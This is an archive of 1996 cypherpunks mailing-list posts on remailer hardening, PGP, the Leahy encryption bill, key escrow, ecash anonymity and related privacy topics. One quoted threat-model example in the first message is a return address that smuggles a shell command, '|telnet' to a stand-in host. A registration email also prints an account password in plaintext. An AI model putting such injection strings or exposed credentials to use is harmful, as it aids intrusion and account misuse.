Message-ID: <199603140613.AAA00470@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


(warning:  I don't know much about security, so if you don't either, 
don't take what I have to say too seriously...)

> 	This is a long standing debate in the security community.
> Some folks like multiple box security.  Others point out that using
> two boxes means both need to be well secured, and you have twice as
> many places to make mistakes.

Ok, I see your point.  If someone compromises workstation, they can read
all the mixmaster packets by looking at what comes in and out of blackbox. 
But they still can't grab the passphrase and key, so old and future
traffic is safer, and if there's a large reordering pool they'll have
trouble matching a given incoming packet with a given outgoing packet. 

> 	Lets say the boxes are called workstation and blackbox.  If I
> break into workstation, I can provide bogus files for blackbox.  Since
> blackbox extends some trust to workstation, it might not be expecting
> to see a message with a return address of "`|telnet evil.fbi.gov`".

It seems to me that if you're just running a remailer that only talks to
one other machine, it ought to be possible to eliminate this kind of a
problem.  Blackbox grabs a file from a queue on workstation, runs it
through mixmaster, and deposits the output in an outgoing queue on
workstation.  If the trojan file is something strange, it will just drop
through mixmaster.  Maybe it would choke workstation on the way out, but
blackbox -- and the passphrase -- would be safe.

> 	I'd argue that setting up a simple mailer which uses
> workstation as a relay host gives you as much security, and lessens
> your dependance on workstation, which we expect will be comprimised.

If we leave sendmail on, we're hosed -- wouldn't bb moving packets on and
off workstation with ssh's rcp be a lot safer? 

> (Of course we expect ws to be comprimised.  Why else are we setting up
> bb as a seperate machine?)

Agreed.

> 	Turning of getty and removing the swap file strike me as a bit
> extreme.  A panic login system, otoh, that accepts a bad password and
> wipes the disk, might not be a bad idea.  (Of course, if this becomes
> popular, the bad guys will just rip out your disk and read it on
> another machine.)

I admit freely that this is all extreme and impractical...  I was just
trying to think through the problem.

I was shooting for a system that would be worthless to an attacker if it
was turned off, and which couldn't be hacked easily from the console
without turning it off.

A crypto file system directory will be worthless if the machine goes down,
and if there's no swapfile, there's not going to be anything nasty left
behind there.  The bad guys *can't* rip out your hard drive and read it,
because all the good stuff is on the cfs drive -- it's just a big blob of
idea'd data, and neither the remailer' or cfs's passphrase was ever
written to disk.  

When bb boots, it waits for the sysadmin to ssh in and mount the cfs drive
manually, then start the remailer manually.

If the attacker didn't know what you've got in place, he'd probably just
steal the machine assuming he could get something out of it when he's got
it back on his workbench.  If he did know the details of the system, he'd
be faced with trying to extract the cfs and remailer passwords from the
machine's ram without turning it off and without being able to login from
the console -- ideally you wouldn't even have a keyboard plugged in.  (I
have no idea how hard it would be to steal information from a running
machine's ram -- or if it's even possible).

> 	Be awful tough if it only listens to ssh & smtp.  Are you sure
> your kernel doesn't do anything bogus with ICMP?  Data overflows in
> ssh or smap?  DNS, syslogd, tty overloads?

Actually, it only listens to ssh;  a bug there is fatal.  Same goes for
the kernel.  We don't need dns -- to bb, the only other machine in the
universe is workstation, and it knows the IP address.

If the core system can't run without incident, you're in trouble.  But 
couldn't you do a pretty good job of shielding it from surprises by 
turning almost everything off and not letting it talk to the outside 
world, except in very narrow ways?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dch@uriacc.uri.edu (D. C. Hilliard)
Date: Thu, 14 Mar 1996 08:52:24 -0500
To: lacc@suburbia.net
Subject: LACC: PC Phones Home?
Message-ID: <v01530500ad6c434fbf76@[131.128.2.180]>
MIME-Version: 1.0
Content-Type: text/plain


Listers,

I came across a blurb in the local paper today and was interested if
someone here could provide some substance to the story:

"Software to the rescue:
If somoeone steals your PC, you may be able to get it back because of
software that acts as a kind of tracking device. Home Office Computing
magazine reports that the software CompuTrace TRS will automatically dial
the office of its creator, Absolute Software, if a thief hooks up a stolen
PC's modem to a phone line. The software reveals the location of the PC and
Absolute Software will call the police" - Providence Journal-Bulletin -
March 12, 1996.

Any Comments?

Regards,

Dennis C. Hilliard, M.S.
Director/Assistant Professor
Rhode Island State Crime Laboratory
220 Fogarty Hall - URI
41 Lower College Road
Kingston, RI 02881-0809
Voice: 401-792-2893;  Fax: 401-792-2181
********************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 14 Mar 1996 14:53:09 +0800
To: matthew@itconsult.co.uk (Matthew Richardson)
Subject: Re: PGP reveals  the key ID of the recipient of encrypted msg
Message-ID: <v02140b02ad6cf666a636@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:12 3/13/96, Matthew Richardson wrote:

>On Wed, 13 Mar 1996 00:28:48 -0500, "Robert A. Rosenberg"
><hal9001@panix.com> wrote:
>
>>There is also the problem of knowing WHICH key to use (ie: Even when you
>>know the message is intended for you, you must do a test run with each of
>>your keys until one works).
>
>I believe that provided all your keys are in your secret keyring, PGP
>will automatically pick the correct one for you.

I know that. The situation was that the hypothetical message format itself
contained NO INDICATION of who is was for or what key was used to encode
it. PGP selects the right key by using the indication that is in the
message of what key is to be used.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 16 Mar 1996 19:37:47 +0800
To: WlkngOwl@UNiX.asb.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <m0tx8c5-0008yLC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 PM 3/13/96 -0800, jamesd@echeque.com wrote:
>At 03:27 PM 3/13/96 -0800, jim bell wrote:
>
>> There is nothing in Leahy's bill which appears to prohibit the 
>> escrow agent from informing the key holder of a request/demand for the key; 
>
>On the contrary:  See section 2802(c)(4)

Ooops! You're right, it's much worse than I thought...

This bill is truly a pile of crap.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Mar 1996 12:32:50 +0800
To: cypherpunks@toad.com
Subject: Interesting Egghead freebee
Message-ID: <2.2.32.19960314084336.008b11f8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


While at Egghead today, I found out that they are giving away copies of Spry
Mosaic in a Box. (You have to buy something, but that was why I was there
anyways...) So far, it seems to be worth about what you pay for it.  It is
designed to connect you to Compu$lave.

What has this to do with this list you ask?  The product actually claims to
support S-HTTP!  (No export warnings on the package and no real info as to
how it is implemented...  I suspect brand-name snake oil here.)  For those
of you who do web development and are interested in a client that actually
supports S-Http (I do not believe the d/lable version does), take a look.
(It does install alot of crap, like a new Winsock, so be warned.)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Thu, 14 Mar 1996 15:50:59 +0800
To: cypherpunks@toad.com
Subject: Re: Beat Remote Monitor Snooping?
In-Reply-To: <Pine.SV4.3.91.960313223844.19338E-100000@larry.infi.net>
Message-ID: <9603140628.AA4032@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Alan Horowitz <alanh@infi.net> writes:

  > Visual contrast is not the same thing as frequency diffrence. It
  > is quite easy to measure extremely small changes of phase.

Apropos of *what*?!  If it was an NTSC colour TV; yes, you could
measure the colour by the phase of the 3.579 colour burst.  But modern
computer monitors (i.e. VGA) don't represent colour that way at all --
they use separate red, green, and blue video signals.  And the
original poster is correct -- it is extremely difficult to determine
which guns are generating any given pixel, using van Eck monitoring.

The only com/mil ELINT demo I've ever seen of a VGA monitor generated a
greyscale display.

  > Nice try, but no cigar.

If the shoe fits...

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 15 Mar 1996 11:33:18 +0800
To: cypherpunks@toad.com
Subject: Re: PGP reveals the key ID of the recipient of encrypted msg
Message-ID: <960314020217_245709855@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


There is a way to beat this--generate new public keys on a frequent basis,
and send them to whoever wants to send you absolutely anonymous mail in
encrypted form.  Have your anonymous partner do likewise.  Since the key ID
is fairly random, if it changes constantly, it will be irrelevant if it shows
up in a message only once.  Keep a separate (and temporary) key ring for
these temporary public keys, so you can delete the key ring files when they
start getting too large.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 14 Mar 1996 13:41:39 +0800
To: cypherpunks@toad.com
Subject: House Votes to Weaken Anti Terror Bill
Message-ID: <199603140315.EAA23375@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


House Votes to Weaken Anti Terror Bill

Washington, March 13 (Reuter) -- The House of
Representatives Wednesday removed major provisions of an
anti-terrorism bill in a vote that sponsors of the
legislation said would gut the measure.

An amendment, adopted 246-171 by conservative Republicans 
and some liberal Democrats, removed language that would
give the government authority to label groups as
terrorist so foreign members can be deported more easily.
It also prohibits use of wiretap evidence obtained
without a warrant.

"We do not need to give our government vast new powers,"
Georgia Republican Bob Barr, the amendment's author, said
before the vote. He said current laws were strong enough.

"With the Barr amendment this is not a real
anti-terrorism bill," said Republican Henry Hyde of
Illinois, the bill's main sponsor and chairman of the
House Judiciary Committee.

Hyde said an unusual coalition of groups including the
conservative National Rifle Association and the liberal
American Civil Liberties Union were opposing the bill
because they thought it gave the federal government too
much power.

Hyde said one Republican colleague told him privately,
" 'I trust Hamas (the militant Islamic group) more than
my own government.' "






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: registrar@switchboard.com (Switchboard Registrar)
Date: Fri, 15 Mar 1996 12:31:37 +0800
To: cypherpunks@toad.com
Subject: Welcome to Switchboard
Message-ID: <19960314042717722.AAA75@www2>
MIME-Version: 1.0
Content-Type: text/plain


  Thank you for registering in the Switchboard database.
Your Switchboard login is:

     Email: cypherpunks@toad.com
  Password: DrawLint

This password is case sensitive.

  Once you log in (set your browser to http://www.switchboard.com),
your entry appears in the directory with your email address
attached.  You may then update your listing to show
exactly the information you want and correct errors.
Note that Switchboard waits until you log in to change the
directory, because this step verifies that your email address
is correct.

  Logging in also allows you to create an additional
listing, change your password, list your home page URL,
unlist your main listing, and access other features.

  Once you are logged in, please change your password to make it
easier to remember.

  If you did not register in Switchboard and received this message
erroneously, please Reply to Registrar@switchboard.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Thu, 14 Mar 1996 12:47:10 -0500
To: cypherpunks@toad.com
Subject: Commercial Key Escrow as Prerequisite to 64 bit Export
Message-ID: <9603141517.AA21378@supernova.netapp.com>
MIME-Version: 1.0
Content-Type: text/plain



SIGNAL, March 1996, page 9:

U.S Allows Firewall Export

  The U.S. government has approved a 56-bit data encryption standard
(DES) encrypted firewall for export.  The device could create a global
virtual private network by encrypting the Internet protocol layer of the
communications stream among firewalls.
  The system's manufacturer has obtained permission to exports its 56-
bit, DES-encrypted firewall by incorporating a proprietary commercial
key escrow recovery technology into the firewall.  The U.S. govern-
ment will allow the export of cryptographic products with key lengths
of up to 64 bits, provided that a capability allows emergency access to
encryption keys for law enforcement and national security reasons.
  Terms of the export license require the manufacturer, Trusted
Information Systems, Incorporated, Glenwood, Maryland, to maintain a
commercial key escrow data recovery center in the United STates.

---

1) Is there a market for products overseas that the U.S. government
   can peer through?

2) Will we ever hear what constitutes a demand for disclosure of keys
   for "national security reasons"?

{please CC: koontz@netapp.com, currently not subscribed to cypherpunks}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 14 Mar 1996 12:58:13 -0500
To: cypherpunks@toad.com
Subject: Kid Gloves or Megaphones
Message-ID: <199603141529.HAA12877@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


I've been engaged in a background discussion with some folks about how
to treat a new protocol, when to speak, etc.  Elements of that
discussion have become relevant to the list widely.

The situation is thus.  Ian Goldberg et al. have developed a protocol
for simultaneous payer and payee anonymity.  It appears to be novel,
albeit not entirely unanticipated.  The protocol works with the
existing bank signing oracle and could interoperate with Mark Twain's
current system.

The suggestion was made, paraphrasing -- couldn't we just not talk
about this too loudly yet?

... NO!

Perhaps the single most important lesson I've learned from cypherpunks
is that code alone doesn't cut it.  Not code alone, not code widely
distributed, not even code widely used.  Some measure of toleration in
society for activities conducted in private is _necessary_ for long
term success.  Not convenient, not easier, but necessary.

The whole Clipper situation testifies to this.  Unless there is a
public concensus that people generally should be able to use their own
cryptography, then such use will become marginalized.  Legislatures
will outlaw, the public will disapprove, and vigilantes will hunt down
improper use.  That, in my book, means we've lost.

Code is clearly still necessary.  Code demonstrates what actually
happens.  To write code is to invoke and evoke the latent and
insufficiently articulated desires for privacy in the world at large.

Similarly with anonymous transactions.  Unless a similar concensus
exists, we will have another marginal activity.  Again, I count this a
loss.

Backlash will result from later disclosure that the payment systems we
generally as cypherpunks have undisclosed properties, that we as a
loose group have dissimulated and even lied outright about the
capabilities of the systems we advocate.  This backlash will wipe away
many gains we might have made and eliminate the possibility of future
ones.

The backlash will be justified, because it will be the natural result
of a demonstration of bad faith.  One such demonstration now, and who
would know when the next was coming, or that we had not hoarded
encrypted agendas all along in our hearts?  And then, since we would
not be believed, all the propaganda of our opponents will triumph.
The Four Horsepersons will come trotting out in grand inquisitional
spectacle, and there will be no counterpoint, because the devil's
advocate will have been discovered to have been guilty himself.

It is foolishness itself to deceive a public which is substantially in
favor of the program of complete privacy.  We must appeal to the
public that finally will decide, not to some officials today who have
power and tomorrow who will not.  Clipper itself was not defeated by
constructive engagement with the Clinton wiretap administration.
Clipper was defeated by a general call to arms.

Therefore, shout out to the world that payee anonymity is possible with
ecash(TM)!

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Thu, 14 Mar 1996 08:21:40 -0500
To: jim bell <jimbell@pacifier.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <199603141305.IAA07488@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Mar 96 at 15:27, jim bell wrote:
[..]
>                                                            That's why I'm more than a little 
> disturbed about the one really bad portion of the Leahy bill:  The one that 
> makes using encryption to thwart an investigation a crime......

Same here. If crypto becomes commonplace in everything, one may not 
have a choice if one is in the midst of a crime.  And what if the 
"crime" is planning a demonstration that say, interferes with some 
government activity?  You don't want the COINTELPRO busybodies to 
know what you're planning, but when you're arrested it's another 
charge they can throw in.

[..]
> If I were trying to detect government investigation in such a situation, I 
> would buy a crypto phone, open an "escrow account" on a totally voluntary 
> basis, give them a phony key, and then (as part of the 
(presumably?)  [..]

Would it be legal to deceive an escrow agent?

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Sun, 17 Mar 1996 01:27:12 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: RE: Leahy bill, legalize crypto
Message-ID: <c=US%a=_%p=INTERGRAPH%l=HQ6960314084112DB008000@hq14.pcmail.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May said:
>Suppose encryption is allowed, but only with key escrow? [...]
>And it might pass constitutional muster (for the same reasons the FCC
>jurisdiction over airwaves and the ban on encryption by ham operators, got
>approval. 

The restriction on using encryption on the ham bands is an outgrowth of the 
world-wide spectrum allocation process. Spectrum's allocated by the 
International Telecommunications Union (ITU); every four years, the World 
Amateur Radio Council (WARC) meets to go over existing allocations. 
Sometimes hams lose (as when the 220MHz band went away) and sometimes they 
win.

The ITU accords were originally signed around WW I, when use of encryption 
on the radio bands was of great concern. The whole licensing system is based 
on the concept of an Amateur Radio _Service_, whose operators are licensed 
by the FCC to use a "public" resource. Said use is restricted by 
international treaties to which the US is a signatory.

The difference here is that the courts have upheld government restrictions 
on broadcast spectrum because it's a scarce resource. In the special case of 
encryption on ham bands, no one's ever even challenged the restriction 
AFAIK. As Duncan Frissell has preached here many times, bandwidth is no 
longer as scarce, so I think a constitutional challenge to an encryption ban 
would probably be workable.

-Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 14 Mar 1996 11:44:23 -0500
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: How's that again?
In-Reply-To: <199603141404.PAA14993@utopia.hacktic.nl>
Message-ID: <199603141439.JAA13388@homeport.org>
MIME-Version: 1.0
Content-Type: text


Anonymous wrote:

| adam@lighthouse.homeport.org writes:
| 
| | I disagree with your thoughts, and find you annoying and
| | unwilling to answer substantitive questions raised about your plans.
| | Furthermore, most of your posts are way too long.
| 
| Your posts more annoying, and too short.

"Your posts ARE more annoying" you mean.

If you're going to flame me, at least do so in decent English.
Sheesh.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 15 Mar 1996 11:06:53 +0800
To: eric@remailer.net
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <199603141818.KAA16974@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: eric@remailer.net (Eric Hughes)
> The situation is thus.  Ian Goldberg et al. have developed a protocol
> for simultaneous payer and payee anonymity.  It appears to be novel,
> albeit not entirely unanticipated.  The protocol works with the
> existing bank signing oracle and could interoperate with Mark Twain's
> current system.
> [...]
> It is foolishness itself to deceive a public which is substantially in
> favor of the program of complete privacy.  We must appeal to the
> public that finally will decide, not to some officials today who have
> power and tomorrow who will not.  Clipper itself was not defeated by
> constructive engagement with the Clinton wiretap administration.
> Clipper was defeated by a general call to arms.
> 
> Therefore, shout out to the world that payee anonymity is possible with
> ecash(TM)!

As is well known, Chaum has been saying that one of the good features of
ecash (from the point of view of regulators and law enforcement) is that
payee anonymity is not supposed to be possible.  This means that if
someone sets up a shop to sell something illegally, they can be caught.
(I suspect that is at least part of the reason why you have to fill out a
multi page form to open an ecash account, so they have enough information
to arrest you if you break the law.)

It also means that various kinds of crimes would be prevented as well,
such as theft of funds or extortion.  Imagine that someone starts
lobbing mailbombs at the cypherpunks list, and demands a payment of $1
a week from each subscriber to keep him from doing it, said payments to
be posted to some newsgroup encrypted with a specified PGP key.  Right
now he could be caught when he tries to deposit his ill-gotten riches.
But with payee anonymity that could be avoided.

As a remailer operator I unfortunately see more of the seamy side of
anonymity than most people.  I do think there are people who will take
advantage of this technology in harmful ways.  So payee anonymity will
certainly make life more interesting.

However, Mark Twain Bank presumably went into this business with the
expectation that they were providing a non-payee-anonymous payment
system.  They have already shut down at least a couple of merchants who
were selling materials not to MTB's taste.  So if they find out that they
are now providing the perfect payment system for criminals, I would not
be surprised to see them suspend the ecash trial and demand that Chaum
redesign the system to truly make it non-anonymous for payees, if that is
possible.

So while I admire Eric's ethical concern about making relevant
information about the properties of ecash available, it is also important
to understand the possible outcome.

One thing I notice that was missing from Eric's posting was a description
or reference to exactly how the payee anonymity is achieved.  Is it his
intention to tell people that it is possible, yet to keep secret how it
is done?  This way there might be a debate about the desirability of full
anonymity, while not actually putting these tools into the hands of those
who would misuse them.  And it might lessen the chance of precipitate
action by MTB and other ecash issuers.

But on the other hand it's not clear that keeping it secret is possible
or desirable.  A full discussion of the issue will require
understanding of technical aspects.  How effective is the payee
anonymity?  How about a timing/amount coincidence attack, where
payments of X dollars to anonymous person A are always followed a few
moments later by deposits of X dollars to account B?  Does the payee
need to trust a "broker" who serves as an intermediary with the bank?
Is there any way the bank can distinguish a payee-anonymous deposit
from a normal one, and are there any countermeasures the bank could
take to prevent payee anonymity?  These questions would seem to require
understanding of how the scheme works.

Also, there were a number of postings a few months ago by people who had
ideas about how payee anonymity could be done.  They mostly had drawbacks
and may not be as nice as what Ian has come up with, but could perhaps
serve as a starting point for re-creating something similar to Ian's
ideas.  So keeping it secret may not be a practical possibility.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 14 Mar 1996 13:21:38 -0500
To: cypherpunks@toad.com
Subject: The Path to Anonymity
Message-ID: <199603141540.KAA29000@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Thanks to anonymous and AJ the exemplary report:

      Privacy-enhancing Technolgies: The Path to Anonymity

      Registratiekamer, The Netherlands
      Information and Privacy Commissioner/Ontario, Canada

      August 1995

      Volume I
      Volume II

   is available at:

      http://www.replay.com/mirror/privacy/

   _________________________________________________________

   Introduction [Excerpts]

   The Dutch Data Protection Authority (the Registratiekamer)
   and the Information and Privacy Commissioner for the
   Province of Ontario, Canada (IPC) are both privacy
   protection agencies that oversee compliance with their
   respective juridiction's privacy laws. The Registratiekamer
   and IPC decided to pool their resources and collaborate in
   the production of a report exploring privacy technologies
   that permit transactions to be conducted anonymously. The
   first international paper of this type includes a survey of
   companies that might be expected to offer such
   technologies, and organizations that might use them.

   In addition to anonymous transactions, the range of
   security features commercially available for use and the
   types of services actually being used by various
   organizations were also examined (see 2.1 Survey
   methodology). The Registratiekamer and IPC felt that a
   joint report outlining the practices followed in their
   respective jurisdictions would shed some light on this
   little-studied but extremely important area where the
   future of privacy-protection in an electronic world may
   lie.

   Consumer polls have repeatedly shown that individuals value
   their privacy and are concerned with its potential loss
   when so much of their personal information is routinely
   stored in computer databases, over which they have no
   control. Protecting one's identity goes hand in hand with
   preserving one's ability to remain *anonymous* -- a key
   component of privacy. While advances in information and
   communications technology have fuelled the ability of
   organizations to keep massive amounts of personal data,
   this has increasingly jeopardized the privacy of those
   whose information is being collected. Minimizing
   identifying data would restore privacy considerably, but
   would still permit the collection of needed information.

   When assessing the need for identifiable data during the
   course of a transaction, the key question one must start
   with is: how much personal information/data is truly
   required for the proper functioning of the information
   system involving this transaction? This question must also
   be asked at the outset -- prior to the design and
   development of any new system. But this is not the case
   today.

   This question is rarely asked at all since there is such a
   clear preference in favour of collection identifiable data,
   'the more the better'. However, with the growth of
   networked communications and the ability to link a wide
   number of diverse databases electronically, people will
   become more and more reluctant to leave behind a trail of
   identifiable data. What is needed is a paradigm shift away
   from a 'more is better' mindset to a minimalist one. Is it
   possible to minimize the amount of identifiable data
   presently collected and stored in information systems, but
   still meet the needs of those collecting the information?
   We believe that it is.

   The technology needed to achieve this goal exists today. We
   will describe some of the privacy technologies that permit
   one to engage in transactions without revealing one's
   identity by introducing the concept of an *identity
   protector*. The notion of *pseudonymity* will also be
   introduced as an integral part of protecting one's
   identity. These technologies are available now and within
   our reach; what is needed is the will to implement privacy
   technologies over the tracking technologies that are in use
   today.

   When organizations are asked what measures they have in
   place to protect privacy, they usually point to their
   efforts at keeping information secure. While the use of
   security measures to prevent unauthorized access to
   personal data is a very important component of privacy, it
   does not equal privacy protection. The latter is a much
   broader concept which starts with the questioning of the
   initial collection of the information to ensure there is a
   good reason for doing so and that its uses will be
   restricted to legitimate ones that the data subject has
   been advised of. Once the data has been collected, security
   and confidentiality become paramount. Effective security
   and confidentiality will depend on the implementation of
   measures to create a secure environment.

   Alternatively, instead of restricting the focus to security
   alone, a more comprehensive approach would be to seek out
   ways in which technology may be used to enhance the
   protection of informational privacy or data protection. We
   use the term *privacy technologies* to refer to a variety
   of technologies that safeguard personal privacy by
   minimizing or eliminating the collection of identifiable
   data.

   Not only are measures that safeguard privacy becoming an
   important mark of quality, but increasingly, consumers are
   demanding that organizations pay attention to their privacy
   concerns. Social acceptance of demands for one's personal
   information, without adequate assurances of protection,
   appears to be on the decline. Not only do consumers wish to
   maintain control over their personal data and be informed
   of its uses, but insufficient protection will be reason
   enough for consumers to take their business elsewhere -- to
   companies that follow privacy-protective practices.

   -----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 14 Mar 1996 14:13:30 -0500
To: cypherpunks@toad.com
Subject: Re: Remailer passphrases
Message-ID: <960314111212_446292183@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-14 01:52:14 EST, you write:

>It is probably possible.  Put a clip across the CPU chip, and take over
>from it by raising it's chip disable will work with some microprocessors. 
>However, the proper application of various kinds of rubber hose to the
>operator should make that kind of attack unnecessary.

In general, this is an excellent way to make smoke and big sparks, which
(since shorts tend to overtax the power supply and drop voltage levels) is a
good way to clear system RAM, thus defeating the purpose of the exercise.
 Software hacks can do the job just as well, and don't require special
breathing apparatus.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 16 Mar 1996 01:37:21 +0800
To: cypherpunks@toad.com
Subject: Fencing (location-signalling computers)
In-Reply-To: <ad6c9d2805021004d38c@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.960314105723.16178A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Mar 1996, Timothy C. May wrote:

> (And then they'll have to return the computer as stolen property and tell
> what they know about who sold it to them. Sounds fair to me.)

Really? In Sweden, if you buy stolen property from a thief or fence
'in good faith', not knowing that it was stolen (usally arguable in
court only if the price was substantially below market value) you
can keep it. The original owner, or his insurance company, can buy
it back only if you let them. It's up to the others to prove that
you didn't act 'in good faith' - if it can be proved that you did
not, you are likely to be prosecuted for fencing, of course (if
the state doesn't drop the case for lack of manpower, which often
occurs with 'minor' crimes).

I can think of another application for computers (or modems)
signalling their presence with regular intervals. Manufacturers
can keep track of their use, life-length etc. Using some kind
of Chaumian blind signatures (like those implemented in
anonymous toll systems) this could be done without revealing
the geographical location of a specific computer, I guess - the
manufacturers presumably wouln't care if the hardware was stolen
or not.

Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 15 Mar 1996 12:37:08 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer passphrases
Message-ID: <199603141930.LAA03089@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 AM 3/14/96 -0500, JonWienke@aol.com wrote:
>In a message dated 96-03-14 01:52:14 EST, you write:
>
>>It is probably possible.  Put a clip across the CPU chip, and take over
>>from it by raising it's chip disable will work with some microprocessors. 
>>However, the proper application of various kinds of rubber hose to the
>>operator should make that kind of attack unnecessary.
>
>In general, this is an excellent way to make smoke and big sparks, which
>(since shorts tend to overtax the power supply and drop voltage levels) is a
>good way to clear system RAM, thus defeating the purpose of the exercise.
> Software hacks can do the job just as well, and don't require special
>breathing apparatus.

Provided you insist on UNIX.  I still think rubber hoses will be the
technique of choice.  That was what the Scientologists used on
anon.penet.fi.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 14 Mar 1996 17:25:16 -0500
To: cypherpunks@toad.com
Subject: RE: Leahy bill, legalize crypto
Message-ID: <199603141930.LAA03097@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 3/14/96 -0800, Timothy C. May wrote:
>At 2:41 PM 3/14/96, Robichaux, Paul E wrote:
>>Tim May said:
>Besides which, I think the "scarce resource" argument against crypto over
>the airwaves is clearly a fig leaf. Only amateur, non-corporate users are
>affected. The intent of the rules, never repealed, seems more of an attempt
>to limit the widespread deployment of ham radio for espionage purposes
>(e.g., a ham sitting above a harbor area reporting on ship movements).

I think Tim is absolutely right.  If you look at "The Code Breakers" that
kind of thinking was common in the WW1-WW2 era.  The age of the 30 minute
war somewhat diminished the strength of the argument.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Lee Jeffers <gjeffers@ns.htc.net>
Date: Thu, 14 Mar 1996 15:10:54 -0500
To: cypherpunks@toad.com
Subject: recent ( 3 months ) software developements?
Message-ID: <9603141743.AA18898@ns.htc.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

   Due to really lousey circumstances, I have been unable to monitor my
mail for the last 3 months. Also, last 3 months mail currently unavailble
to me. I am interested in finding out if there have been any new soft-
ware offerings or software upgrades in that time. My particular interest
is Dos/Windows. Also, locations where software can be downloaded. Note
that a brief description of recent software developements maybe helpful
to other Cypherpunks with little time to monitor Cypherpunks list.

                                                   Beat State,
                                                   Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 16 Mar 1996 00:30:46 +0800
To: cypherpunks@toad.com
Subject: Venona NSA web page
Message-ID: <199603141942.LAA28926@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Date:      Wed, 13 Mar 1996 06:59:32 -0500 (EST)
From: merkaba@styx.ios.com
Subject:   VENONA PROJECT (fwd)




- - ---------- Forwarded message ----------
Date: Tue, 12 Mar 1996 22:07:24 -0500
From: Ronald Pearce <ronald@cybercomm.net>
